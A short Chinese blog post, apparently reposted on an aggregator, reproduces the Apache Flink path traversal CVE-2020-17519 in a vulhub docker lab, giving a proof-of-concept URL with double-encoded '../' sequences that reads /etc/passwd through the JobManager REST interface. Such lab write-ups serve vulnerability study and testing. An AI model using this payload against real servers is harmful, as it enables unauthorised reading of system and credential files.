Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)漏洞

Posted Miss61005

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)漏洞相关的知识,希望对你有一定的参考价值。

原理:

Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.11.0中引入的一项更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

漏洞复现所用工具:

Ubuntu虚拟机,docker,vulhub环境。

漏洞复现:

docker-compose up -d

访问http://ip:8081,环境搭建成功,如下图所示

直接访问POC:

https://IP:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd


漏洞复现成功。

创作挑战赛 新人创作奖励来咯,坚持创作打卡瓜分现金大奖

以上是关于Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)漏洞的主要内容,如果未能解决你的问题,请参考以下文章

Apache Flink 入门,了解 Apache Flink

译文《Apache Flink官方文档》 Apache Flink介绍

Flink从入门到精通100篇(二十一)-Apache Flink 与 Apache Hive 的集成

apache flink入门一

Apache Flink 欺诈交易检测

如何选择Apache Spark和Apache Flink